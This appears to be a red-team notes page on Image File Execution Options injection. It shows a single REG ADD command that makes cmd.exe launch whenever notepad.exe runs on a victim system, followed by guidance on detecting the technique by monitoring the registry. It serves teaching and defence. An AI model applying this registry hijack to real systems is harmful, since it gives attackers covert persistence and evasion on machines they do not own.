Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Primary Access Token Manipulation
Windows NamedPipes 101 + Privilege Escalation
DLL Hijacking
WebShells
Image File Execution Options Injection
Unquoted Service Paths
Pass The Hash: Privilege Escalation with Invoke-WMIExec
Environment Variable $Path Interception
Weak Service Permissions
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Image File Execution Options Injection
Defense Evasion, Persistence, Privilege Escalation

Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:
[email protected]
1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
Copied!
Launching a notepad on the victim system:
Same from the cmd shell:

Observations

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

References

Event Triggered Execution: Image File Execution Options Injection, Sub-technique T1546.012 - Enterprise | MITRE ATT&CK®
Image File Execution Options (IFEO)
docsmsft
A Debugging Approach to IFEO
docsmsft
Previous
WebShells
Next
Unquoted Service Paths
Last modified 3yr ago
Copy link
Contents
Execution
Observations
References